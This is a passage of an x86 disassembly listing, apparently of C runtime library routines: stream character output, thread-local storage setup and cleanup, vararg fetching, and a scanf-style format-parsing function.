arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
dec dword ptr [ecx+4]
js short loc_42E3D7
mov edx, [ecx]
mov al, byte ptr [ebp+arg_0]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_42E3E2
; ---------------------------------------------------------------------------
loc_42E3D7: ; CODE XREF: sub_42E3BE+9�j
push ecx
push [ebp+arg_0]
call sub_42DB65
pop ecx
pop ecx
loc_42E3E2: ; CODE XREF: sub_42E3BE+17�j
cmp eax, 0FFFFFFFFh
mov eax, [ebp+arg_8]
jnz short loc_42E3EF
or dword ptr [eax], 0FFFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42E3EF: ; CODE XREF: sub_42E3BE+2A�j
inc dword ptr [eax]
pop ebp
retn
sub_42E3BE endp
; =============== S U B R O U T I N E =======================================
sub_42E3F3 proc near ; CODE XREF: sub_42DC7D+65A�p
; sub_42DC7D+68C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
push edi
mov edi, [esp+8+arg_4]
mov eax, edi
dec edi
test eax, eax
jle short loc_42E421
mov esi, [esp+8+arg_C]
loc_42E404: ; CODE XREF: sub_42E3F3+2C�j
push esi
push [esp+0Ch+arg_8]
push [esp+10h+arg_0]
call sub_42E3BE
add esp, 0Ch
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_42E421
mov eax, edi
dec edi
test eax, eax
jg short loc_42E404
loc_42E421: ; CODE XREF: sub_42E3F3+B�j
; sub_42E3F3+25�j
pop edi
pop esi
retn
sub_42E3F3 endp
; =============== S U B R O U T I N E =======================================
sub_42E424 proc near ; CODE XREF: sub_42DC7D+670�p
; sub_42DC7D+6CA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov ebx, [esp+4+arg_4]
mov eax, ebx
dec ebx
push esi
push edi
test eax, eax
jle short loc_42E458
mov edi, [esp+0Ch+arg_C]
mov esi, [esp+0Ch+arg_0]
loc_42E43A: ; CODE XREF: sub_42E424+32�j
movsx eax, byte ptr [esi]
push edi
inc esi
push [esp+10h+arg_8]
push eax
call sub_42E3BE
add esp, 0Ch
cmp dword ptr [edi], 0FFFFFFFFh
jz short loc_42E458
mov eax, ebx
dec ebx
test eax, eax
jg short loc_42E43A
loc_42E458: ; CODE XREF: sub_42E424+C�j
; sub_42E424+2B�j
pop edi
pop esi
pop ebx
retn
sub_42E424 endp
; =============== S U B R O U T I N E =======================================
sub_42E45C proc near ; CODE XREF: sub_42DC7D+E5�p
; sub_42DC7D+124�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov eax, [eax-4]
retn
sub_42E45C endp
; =============== S U B R O U T I N E =======================================
sub_42E469 proc near ; CODE XREF: sub_42DC7D+4FA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 8
mov ecx, [eax]
mov eax, [ecx-8]
mov edx, [ecx-4]
retn
sub_42E469 endp
; =============== S U B R O U T I N E =======================================
sub_42E479 proc near ; CODE XREF: sub_42DC7D+2C7�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov ax, [eax-4]
retn
sub_42E479 endp
; =============== S U B R O U T I N E =======================================
sub_42E487 proc near ; CODE XREF: .text:loc_42C5DF�p
push esi
call sub_42DAC6
call dword_437150 ; TlsAlloc
cmp eax, 0FFFFFFFFh
mov dword_453240, eax
jz short loc_42E4D7
push 74h
push 1
call sub_42B39A
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_42E4D7
push esi
push dword_453240
call dword_43722C ; TlsSetValue
test eax, eax
jz short loc_42E4D7
push esi
call sub_42E4DB
pop ecx
call dword_437154 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
push 1
mov [esi], eax
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_42E4D7: ; CODE XREF: sub_42E487+14�j
; sub_42E487+25�j ...
xor eax, eax
pop esi
retn
sub_42E487 endp
; =============== S U B R O U T I N E =======================================
sub_42E4DB proc near ; CODE XREF: sub_42AB81+16�p
; sub_42E487+39�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword ptr [eax+50h], offset dword_453838
mov dword ptr [eax+14h], 1
retn
sub_42E4DB endp
; =============== S U B R O U T I N E =======================================
sub_42E4EE proc near ; CODE XREF: sub_429B8F�p sub_429B9C�p ...
push esi
push edi
call dword_437170 ; RtlGetLastWin32Error
push dword_453240
mov edi, eax
call dword_437208 ; TlsGetValue
mov esi, eax
test esi, esi
jnz short loc_42E549
push 74h
push 1
call sub_42B39A
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_42E541
push esi
push dword_453240
call dword_43722C ; TlsSetValue
test eax, eax
jz short loc_42E541
push esi
call sub_42E4DB
pop ecx
call dword_437154 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
jmp short loc_42E549
; ---------------------------------------------------------------------------
loc_42E541: ; CODE XREF: sub_42E4EE+2B�j
; sub_42E4EE+3C�j
push 10h
call sub_42C67C
pop ecx
loc_42E549: ; CODE XREF: sub_42E4EE+1A�j
; sub_42E4EE+51�j
push edi
call dword_43720C ; RtlSetLastWin32Error
mov eax, esi
pop edi
pop esi
retn
sub_42E4EE endp
; =============== S U B R O U T I N E =======================================
sub_42E555 proc near ; CODE XREF: sub_42AC8B+2F�p
arg_0 = dword ptr 4
mov eax, dword_453240
cmp eax, 0FFFFFFFFh
jz locret_42E5F4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_42E579
push eax
call dword_437208 ; TlsGetValue
mov esi, eax
test esi, esi
jz short loc_42E5E5
loc_42E579: ; CODE XREF: sub_42E555+15�j
mov eax, [esi+24h]
test eax, eax
jz short loc_42E587
push eax
call sub_4298F2
pop ecx
loc_42E587: ; CODE XREF: sub_42E555+29�j
mov eax, [esi+28h]
test eax, eax
jz short loc_42E595
push eax
call sub_4298F2
pop ecx
loc_42E595: ; CODE XREF: sub_42E555+37�j
mov eax, [esi+30h]
test eax, eax
jz short loc_42E5A3
push eax
call sub_4298F2
pop ecx
loc_42E5A3: ; CODE XREF: sub_42E555+45�j
mov eax, [esi+38h]
test eax, eax
jz short loc_42E5B1
push eax
call sub_4298F2
pop ecx
loc_42E5B1: ; CODE XREF: sub_42E555+53�j
mov eax, [esi+40h]
test eax, eax
jz short loc_42E5BF
push eax
call sub_4298F2
pop ecx
loc_42E5BF: ; CODE XREF: sub_42E555+61�j
mov eax, [esi+44h]
test eax, eax
jz short loc_42E5CD
push eax
call sub_4298F2
pop ecx
loc_42E5CD: ; CODE XREF: sub_42E555+6F�j
mov eax, [esi+50h]
cmp eax, offset dword_453838
jz short loc_42E5DE
push eax
call sub_4298F2
pop ecx
loc_42E5DE: ; CODE XREF: sub_42E555+80�j
push esi
call sub_4298F2
pop ecx
loc_42E5E5: ; CODE XREF: sub_42E555+22�j
push 0
push dword_453240
call dword_43722C ; TlsSetValue
pop esi
locret_42E5F4: ; CODE XREF: sub_42E555+8�j
retn
sub_42E555 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E5F5 proc near ; CODE XREF: sub_429E0E+2A�p
var_1C4 = byte ptr -1C4h
var_1C3 = byte ptr -1C3h
var_64 = byte ptr -64h
var_59 = byte ptr -59h
var_44 = dword ptr -44h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_35 = byte ptr -35h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1C4h
and [ebp+var_15], 0
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
push edi
mov al, [esi]
mov [ebp+var_4], ebx
test al, al
mov [ebp+var_34], ebx
jz loc_42EFFB
mov edi, [ebp+arg_0]
jmp short loc_42E624
; ---------------------------------------------------------------------------
loc_42E61F: ; CODE XREF: sub_42E5F5+9CE�j
mov edi, [ebp+arg_0]
xor ebx, ebx
loc_42E624: ; CODE XREF: sub_42E5F5+28�j
cmp dword_4535C4, 1
jle short loc_42E63C
movzx eax, al
push 8
push eax
call sub_42F12B
pop ecx
pop ecx
jmp short loc_42E64B
; ---------------------------------------------------------------------------
loc_42E63C: ; CODE XREF: sub_42E5F5+36�j
mov ecx, off_4533B8
movzx eax, al
mov al, [ecx+eax*2]
and eax, 8
loc_42E64B: ; CODE XREF: sub_42E5F5+45�j
cmp eax, ebx
jz short loc_42E685
dec [ebp+var_4]
push edi
lea eax, [ebp+var_4]
push edi
push eax
call sub_42F082
pop ecx
pop ecx
push eax
call sub_42F06B
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_42C54C
add esp, 0Ch
loc_42E673: ; CODE XREF: sub_42E5F5+8E�j
test eax, eax
jz short loc_42E685
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_42C54C
pop ecx
jmp short loc_42E673
; ---------------------------------------------------------------------------
loc_42E685: ; CODE XREF: sub_42E5F5+58�j
; sub_42E5F5+80�j
cmp byte ptr [esi], 25h
jnz loc_42EF67
and [ebp+var_35], 0
and [ebp+var_18], 0
and [ebp+var_17], 0
and [ebp+var_E], 0
and [ebp+var_F], 0
and [ebp+var_16], 0
xor edi, edi
and [ebp+var_5], 0
mov [ebp+var_1C], ebx
mov [ebp+var_20], ebx
mov [ebp+var_C], ebx
mov [ebp+var_D], 1
mov [ebp+var_30], ebx
loc_42E6BC: ; CODE XREF: sub_42E5F5+172�j
movzx ebx, byte ptr [esi+1]
inc esi
cmp dword_4535C4, 1
jle short loc_42E6D9
movzx eax, bl
push 4
push eax
call sub_42F12B
pop ecx
pop ecx
jmp short loc_42E6E8
; ---------------------------------------------------------------------------
loc_42E6D9: ; CODE XREF: sub_42E5F5+D3�j
mov ecx, off_4533B8
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_42E6E8: ; CODE XREF: sub_42E5F5+E2�j
test eax, eax
jz short loc_42E6FE
mov eax, [ebp+var_C]
inc [ebp+var_20]
lea eax, [eax+eax*4]
lea eax, [ebx+eax*2-30h]
mov [ebp+var_C], eax
jmp short loc_42E763
; ---------------------------------------------------------------------------
loc_42E6FE: ; CODE XREF: sub_42E5F5+F5�j
cmp ebx, 4Eh
jg short loc_42E741
jz short loc_42E763
cmp ebx, 2Ah
jz short loc_42E73C
cmp ebx, 46h
jz short loc_42E763
cmp ebx, 49h
jz short loc_42E71E
cmp ebx, 4Ch
jnz short loc_42E750
inc [ebp+var_D]
jmp short loc_42E763
; ---------------------------------------------------------------------------
loc_42E71E: ; CODE XREF: sub_42E5F5+11D�j
cmp byte ptr [esi+1], 36h
jnz short loc_42E750
cmp byte ptr [esi+2], 34h
lea eax, [esi+2]
jnz short loc_42E750
inc [ebp+var_30]
and [ebp+var_28], 0
and [ebp+var_24], 0
mov esi, eax
jmp short loc_42E763
; ---------------------------------------------------------------------------
loc_42E73C: ; CODE XREF: sub_42E5F5+113�j
inc [ebp+var_E]
jmp short loc_42E763
; ---------------------------------------------------------------------------
loc_42E741: ; CODE XREF: sub_42E5F5+10C�j
cmp ebx, 68h
jz short loc_42E75D
cmp ebx, 6Ch
jz short loc_42E755
cmp ebx, 77h
jz short loc_42E758
loc_42E750: ; CODE XREF: sub_42E5F5+122�j
; sub_42E5F5+12D�j ...
inc [ebp+var_F]
jmp short loc_42E763
; ---------------------------------------------------------------------------
loc_42E755: ; CODE XREF: sub_42E5F5+154�j
inc [ebp+var_D]
loc_42E758: ; CODE XREF: sub_42E5F5+159�j
inc [ebp+var_5]
jmp short loc_42E763
; ---------------------------------------------------------------------------
loc_42E75D: ; CODE XREF: sub_42E5F5+14F�j
dec [ebp+var_D]
dec [ebp+var_5]
loc_42E763: ; CODE XREF: sub_42E5F5+107�j
; sub_42E5F5+10E�j ...
cmp [ebp+var_F], 0
jz loc_42E6BC
cmp [ebp+var_E], 0
mov [ebp+arg_4], esi
jnz short loc_42E788
mov eax, [ebp+arg_8]
mov [ebp+var_44], eax
add eax, 4
mov [ebp+arg_8], eax
mov eax, [eax-4]
mov [ebp+var_2C], eax
loc_42E788: ; CODE XREF: sub_42E5F5+17F�j
and [ebp+var_F], 0
cmp [ebp+var_5], 0
jnz short loc_42E7A6
mov al, [esi]
cmp al, 53h
jz short loc_42E7A2
cmp al, 43h
jz short loc_42E7A2
or [ebp+var_5], 0FFh
jmp short loc_42E7A6
; ---------------------------------------------------------------------------
loc_42E7A2: ; CODE XREF: sub_42E5F5+1A1�j
; sub_42E5F5+1A5�j
mov [ebp+var_5], 1
loc_42E7A6: ; CODE XREF: sub_42E5F5+19B�j
; sub_42E5F5+1AB�j
mov ebx, [ebp+arg_4]
movzx esi, byte ptr [ebx]
or esi, 20h
cmp esi, 6Eh
mov [ebp+var_3C], esi
jz short loc_42E7DF
cmp esi, 63h
jz short loc_42E7D0
cmp esi, 7Bh
jz short loc_42E7D0
push [ebp+arg_0]
lea eax, [ebp+var_4]
push eax
call sub_42F082
pop ecx
jmp short loc_42E7DB
; ---------------------------------------------------------------------------
loc_42E7D0: ; CODE XREF: sub_42E5F5+1C5�j
; sub_42E5F5+1CA�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_42F051
loc_42E7DB: ; CODE XREF: sub_42E5F5+1D9�j
pop ecx
mov [ebp+var_14], eax
loc_42E7DF: ; CODE XREF: sub_42E5F5+1C0�j
xor eax, eax
cmp [ebp+var_20], eax
jz short loc_42E7EF
cmp [ebp+var_C], eax
jz loc_42EFCB
loc_42E7EF: ; CODE XREF: sub_42E5F5+1EF�j
cmp esi, 6Fh
jg loc_42EA56
jz loc_42ED08
cmp esi, 63h
jz loc_42EA33
cmp esi, 64h
jz loc_42ED08
jle loc_42EA80
cmp esi, 67h
jle short loc_42E853
cmp esi, 69h
jz short loc_42E83B
cmp esi, 6Eh
jnz loc_42EA80
cmp [ebp+var_E], 0
mov edi, [ebp+var_4]
jz loc_42EF36
jmp loc_42EF5C
; ---------------------------------------------------------------------------
loc_42E83B: ; CODE XREF: sub_42E5F5+229�j
push 64h
pop esi
loc_42E83E: ; CODE XREF: sub_42E5F5+480�j
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz loc_42EAC8
mov [ebp+var_17], 1
jmp loc_42EACD
; ---------------------------------------------------------------------------
loc_42E853: ; CODE XREF: sub_42E5F5+224�j
mov ebx, [ebp+var_14]
lea esi, [ebp+var_1C4]
cmp ebx, 2Dh
jnz short loc_42E86F
mov [ebp+var_1C4], bl
lea esi, [ebp+var_1C3]
jmp short loc_42E874
; ---------------------------------------------------------------------------
loc_42E86F: ; CODE XREF: sub_42E5F5+26A�j
cmp ebx, 2Bh
jnz short loc_42E88B
loc_42E874: ; CODE XREF: sub_42E5F5+278�j
mov edi, [ebp+arg_0]
dec [ebp+var_C]
inc [ebp+var_4]
push edi
call sub_42F051
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_42E88E
; ---------------------------------------------------------------------------
loc_42E88B: ; CODE XREF: sub_42E5F5+27D�j
mov edi, [ebp+arg_0]
loc_42E88E: ; CODE XREF: sub_42E5F5+294�j
cmp [ebp+var_20], 0
jz short loc_42E89D
cmp [ebp+var_C], 15Dh
jle short loc_42E8A4
loc_42E89D: ; CODE XREF: sub_42E5F5+29D�j
mov [ebp+var_C], 15Dh
loc_42E8A4: ; CODE XREF: sub_42E5F5+2A6�j
; sub_42E5F5+2F2�j
cmp dword_4535C4, 1
jle short loc_42E8B9
push 4
push ebx
call sub_42F12B
pop ecx
pop ecx
jmp short loc_42E8C4
; ---------------------------------------------------------------------------
loc_42E8B9: ; CODE XREF: sub_42E5F5+2B6�j
mov eax, off_4533B8
mov al, [eax+ebx*2]
and eax, 4
loc_42E8C4: ; CODE XREF: sub_42E5F5+2C2�j
test eax, eax
jz short loc_42E8E9
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_42E8E9
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_42F051
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_42E8A4
; ---------------------------------------------------------------------------
loc_42E8E9: ; CODE XREF: sub_42E5F5+2D1�j
; sub_42E5F5+2DB�j
cmp byte_4535C8, bl
jnz short loc_42E957
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_42E957
inc [ebp+var_4]
push edi
call sub_42F051
mov ebx, eax
mov al, byte_4535C8
mov [esi], al
pop ecx
mov [ebp+var_14], ebx
inc esi
loc_42E912: ; CODE XREF: sub_42E5F5+360�j
cmp dword_4535C4, 1
jle short loc_42E927
push 4
push ebx
call sub_42F12B
pop ecx
pop ecx
jmp short loc_42E932
; ---------------------------------------------------------------------------
loc_42E927: ; CODE XREF: sub_42E5F5+324�j
mov eax, off_4533B8
mov al, [eax+ebx*2]
and eax, 4
loc_42E932: ; CODE XREF: sub_42E5F5+330�j
test eax, eax
jz short loc_42E957
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_42E957
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_42F051
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_42E912
; ---------------------------------------------------------------------------
loc_42E957: ; CODE XREF: sub_42E5F5+2FA�j
; sub_42E5F5+304�j ...
cmp [ebp+var_1C], 0
jz loc_42E9EF
cmp ebx, 65h
jz short loc_42E96F
cmp ebx, 45h
jnz loc_42E9EF
loc_42E96F: ; CODE XREF: sub_42E5F5+36F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_42E9EF
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_4]
push edi
call sub_42F051
mov ebx, eax
pop ecx
cmp ebx, 2Dh
mov [ebp+var_14], ebx
jnz short loc_42E996
mov [esi], al
inc esi
jmp short loc_42E99B
; ---------------------------------------------------------------------------
loc_42E996: ; CODE XREF: sub_42E5F5+39A�j
cmp ebx, 2Bh
jnz short loc_42E9B9
loc_42E99B: ; CODE XREF: sub_42E5F5+39F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jnz short loc_42E9AA
and [ebp+var_C], eax
jmp short loc_42E9B9
; ---------------------------------------------------------------------------
loc_42E9AA: ; CODE XREF: sub_42E5F5+3AE�j
; sub_42E5F5+3F8�j
inc [ebp+var_4]
push edi
call sub_42F051
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_42E9B9: ; CODE XREF: sub_42E5F5+3A4�j
; sub_42E5F5+3B3�j
cmp dword_4535C4, 1
jle short loc_42E9CE
push 4
push ebx
call sub_42F12B
pop ecx
pop ecx
jmp short loc_42E9D9
; ---------------------------------------------------------------------------
loc_42E9CE: ; CODE XREF: sub_42E5F5+3CB�j
mov eax, off_4533B8
mov al, [eax+ebx*2]
and eax, 4
loc_42E9D9: ; CODE XREF: sub_42E5F5+3D7�j
test eax, eax
jz short loc_42E9EF
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_42E9EF
inc [ebp+var_1C]
mov [esi], bl
inc esi
jmp short loc_42E9AA
; ---------------------------------------------------------------------------
loc_42E9EF: ; CODE XREF: sub_42E5F5+366�j
; sub_42E5F5+374�j ...
dec [ebp+var_4]
push edi
push ebx
call sub_42F06B
cmp [ebp+var_1C], 0
pop ecx
pop ecx
jz loc_42EFFB
cmp [ebp+var_E], 0
jnz loc_42EF5C
inc [ebp+var_34]
and byte ptr [esi], 0
lea eax, [ebp+var_1C4]
push eax
movsx eax, [ebp+var_D]
push [ebp+var_2C]
dec eax
push eax
call off_453824
add esp, 0Ch
jmp loc_42EF5C
; ---------------------------------------------------------------------------
loc_42EA33: ; CODE XREF: sub_42E5F5+20C�j
cmp [ebp+var_20], eax
jnz short loc_42EA42
inc [ebp+var_C]
mov [ebp+var_20], 1
loc_42EA42: ; CODE XREF: sub_42E5F5+441�j
cmp [ebp+var_5], 0
jle short loc_42EA4C
mov [ebp+var_16], 1
loc_42EA4C: ; CODE XREF: sub_42E5F5+451�j
mov edi, offset dword_45324C
jmp loc_42EB61
; ---------------------------------------------------------------------------
loc_42EA56: ; CODE XREF: sub_42E5F5+1FD�j
mov eax, esi
sub eax, 70h
jz loc_42ED04
sub eax, 3
jz loc_42EB52
dec eax
dec eax
jz loc_42ED08
sub eax, 3
jz loc_42E83E
sub eax, 3
jz short loc_42EAA4
loc_42EA80: ; CODE XREF: sub_42E5F5+21B�j
; sub_42E5F5+22E�j
movzx eax, byte ptr [ebx]
cmp eax, [ebp+var_14]
jnz loc_42EFCB
dec [ebp+var_15]
cmp [ebp+var_E], 0
jnz loc_42EF5C
mov eax, [ebp+var_44]
mov [ebp+arg_8], eax
jmp loc_42EF5C
; ---------------------------------------------------------------------------
loc_42EAA4: ; CODE XREF: sub_42E5F5+489�j
cmp [ebp+var_5], 0
jle short loc_42EAAE
mov [ebp+var_16], 1
loc_42EAAE: ; CODE XREF: sub_42E5F5+4B3�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
cmp byte ptr [edi], 5Eh
jnz loc_42EB65
mov eax, edi
lea edi, [eax+1]
jmp loc_42EB61
; ---------------------------------------------------------------------------
loc_42EAC8: ; CODE XREF: sub_42E5F5+24F�j
cmp ebx, 2Bh
jnz short loc_42EAEF
loc_42EACD: ; CODE XREF: sub_42E5F5+259�j
dec [ebp+var_C]
jnz short loc_42EADE
cmp [ebp+var_20], 0
jz short loc_42EADE
mov [ebp+var_F], 1
jmp short loc_42EAEF
; ---------------------------------------------------------------------------
loc_42EADE: ; CODE XREF: sub_42E5F5+4DB�j
; sub_42E5F5+4E1�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_42F051
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
loc_42EAEF: ; CODE XREF: sub_42E5F5+4D6�j
; sub_42E5F5+4E7�j
cmp ebx, 30h
jnz loc_42ED3D
push [ebp+arg_0]
inc [ebp+var_4]
call sub_42F051
mov ebx, eax
pop ecx
cmp bl, 78h
mov [ebp+var_14], ebx
jz short loc_42EB3D
cmp bl, 58h
jz short loc_42EB3D
cmp esi, 78h
mov [ebp+var_1C], 1
jz short loc_42EB27
push 6Fh
loc_42EB21: ; CODE XREF: sub_42E5F5+55B�j
pop esi
jmp loc_42ED3D
; ---------------------------------------------------------------------------
loc_42EB27: ; CODE XREF: sub_42E5F5+528�j
push [ebp+arg_0]
dec [ebp+var_4]
push ebx
call sub_42F06B
pop ecx
pop ecx
push 30h
pop ebx
jmp loc_42ED3A
; ---------------------------------------------------------------------------
loc_42EB3D: ; CODE XREF: sub_42E5F5+517�j
; sub_42E5F5+51C�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_42F051
pop ecx
mov ebx, eax
mov [ebp+var_14], ebx
push 78h
jmp short loc_42EB21
; ---------------------------------------------------------------------------
loc_42EB52: ; CODE XREF: sub_42E5F5+46F�j
cmp [ebp+var_5], 0
jle short loc_42EB5C
mov [ebp+var_16], 1
loc_42EB5C: ; CODE XREF: sub_42E5F5+561�j
mov edi, offset dword_453244
loc_42EB61: ; CODE XREF: sub_42E5F5+45C�j
; sub_42E5F5+4CE�j
or [ebp+var_18], 0FFh
loc_42EB65: ; CODE XREF: sub_42E5F5+4C3�j
push 20h
lea eax, [ebp+var_64]
push 0
push eax
call sub_429760
add esp, 0Ch
cmp [ebp+var_3C], 7Bh
jnz short loc_42EB89
cmp byte ptr [edi], 5Dh
jnz short loc_42EB89
mov dl, 5Dh
inc edi
mov [ebp+var_59], 20h
jmp short loc_42EB8C
; ---------------------------------------------------------------------------
loc_42EB89: ; CODE XREF: sub_42E5F5+584�j
; sub_42E5F5+589�j
mov dl, [ebp+var_35]
loc_42EB8C: ; CODE XREF: sub_42E5F5+592�j
; sub_42E5F5+5E1�j ...
mov al, [edi]
cmp al, 5Dh
jz short loc_42EBF1
inc edi
cmp al, 2Dh
jnz short loc_42EBD8
test dl, dl
jz short loc_42EBD8
mov cl, [edi]
cmp cl, 5Dh
jz short loc_42EBD8
inc edi
cmp dl, cl
jnb short loc_42EBAB
mov al, cl
jmp short loc_42EBAF
; ---------------------------------------------------------------------------
loc_42EBAB: ; CODE XREF: sub_42E5F5+5B0�j
mov al, dl
mov dl, cl
loc_42EBAF: ; CODE XREF: sub_42E5F5+5B4�j
cmp dl, al
ja short loc_42EBD4
movzx edx, dl
movzx esi, al
sub esi, edx
inc esi
loc_42EBBC: ; CODE XREF: sub_42E5F5+5DD�j
mov ecx, edx
mov eax, edx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
inc edx
dec esi
jnz short loc_42EBBC
loc_42EBD4: ; CODE XREF: sub_42E5F5+5BC�j
xor dl, dl
jmp short loc_42EB8C
; ---------------------------------------------------------------------------
loc_42EBD8: ; CODE XREF: sub_42E5F5+5A0�j
; sub_42E5F5+5A4�j ...
movzx ecx, al
mov dl, al
mov eax, ecx
and ecx, 7
mov bl, 1
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_64]
or [eax], bl
jmp short loc_42EB8C
; ---------------------------------------------------------------------------
loc_42EBF1: ; CODE XREF: sub_42E5F5+59B�j
cmp byte ptr [edi], 0
jz loc_42EFFB
cmp [ebp+var_3C], 7Bh
jnz short loc_42EC03
mov [ebp+arg_4], edi
loc_42EC03: ; CODE XREF: sub_42E5F5+609�j
mov edi, [ebp+arg_0]
mov esi, [ebp+var_2C]
dec [ebp+var_4]
push edi
push [ebp+var_14]
mov [ebp+var_30], esi
call sub_42F06B
pop ecx
pop ecx
loc_42EC1A: ; CODE XREF: sub_42E5F5+6BC�j
; sub_42E5F5+6C4�j
cmp [ebp+var_20], 0
jz short loc_42EC2E
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz loc_42ECCA
loc_42EC2E: ; CODE XREF: sub_42E5F5+629�j
inc [ebp+var_4]
push edi
call sub_42F051
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+var_14], eax
jz short loc_42ECBE
mov ecx, eax
push 1
and ecx, 7
pop edx
movsx ebx, [ebp+var_18]
shl edx, cl
mov ecx, eax
sar ecx, 3
movsx ecx, [ebp+ecx+var_64]
xor ecx, ebx
test edx, ecx
jz short loc_42ECBE
cmp [ebp+var_E], 0
jnz short loc_42ECB6
cmp [ebp+var_16], 0
jz short loc_42ECAB
mov ecx, off_4533B8
mov [ebp+var_38], al
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_42EC8A
inc [ebp+var_4]
push edi
call sub_42F051
pop ecx
mov [ebp+var_37], al
loc_42EC8A: ; CODE XREF: sub_42E5F5+686�j
push dword_4535C4
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_3E]
push eax
call sub_433322
mov ax, [ebp+var_3E]
add esp, 0Ch
mov [esi], ax
inc esi
inc esi
jmp short loc_42ECAE
; ---------------------------------------------------------------------------
loc_42ECAB: ; CODE XREF: sub_42E5F5+673�j
mov [esi], al
inc esi
loc_42ECAE: ; CODE XREF: sub_42E5F5+6B4�j
mov [ebp+var_2C], esi
jmp loc_42EC1A
; ---------------------------------------------------------------------------
loc_42ECB6: ; CODE XREF: sub_42E5F5+66D�j
inc [ebp+var_30]
jmp loc_42EC1A
; ---------------------------------------------------------------------------
loc_42ECBE: ; CODE XREF: sub_42E5F5+649�j
; sub_42E5F5+667�j
dec [ebp+var_4]
push edi
push eax
call sub_42F06B
pop ecx
pop ecx
loc_42ECCA: ; CODE XREF: sub_42E5F5+633�j
cmp [ebp+var_30], esi
jz loc_42EFFB
cmp [ebp+var_E], 0
jnz loc_42EF5C
inc [ebp+var_34]
cmp [ebp+var_3C], 63h
jz loc_42EF5C
cmp [ebp+var_16], 0
mov eax, [ebp+var_2C]
jz short loc_42ECFC
and word ptr [eax], 0
jmp loc_42EF5C
; ---------------------------------------------------------------------------
loc_42ECFC: ; CODE XREF: sub_42E5F5+6FC�j
and byte ptr [eax], 0
jmp loc_42EF5C
; ---------------------------------------------------------------------------
loc_42ED04: ; CODE XREF: sub_42E5F5+466�j
mov [ebp+var_D], 1
loc_42ED08: ; CODE XREF: sub_42E5F5+203�j
; sub_42E5F5+215�j ...
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz short loc_42ED16
mov [ebp+var_17], 1
jmp short loc_42ED1B
; ---------------------------------------------------------------------------
loc_42ED16: ; CODE XREF: sub_42E5F5+719�j
cmp ebx, 2Bh
jnz short loc_42ED3D
loc_42ED1B: ; CODE XREF: sub_42E5F5+71F�j
dec [ebp+var_C]
jnz short loc_42ED2C
cmp [ebp+var_20], 0
jz short loc_42ED2C
mov [ebp+var_F], 1
jmp short loc_42ED3D
; ---------------------------------------------------------------------------
loc_42ED2C: ; CODE XREF: sub_42E5F5+729�j
; sub_42E5F5+72F�j
push [ebp+arg_0]
inc [ebp+var_4]
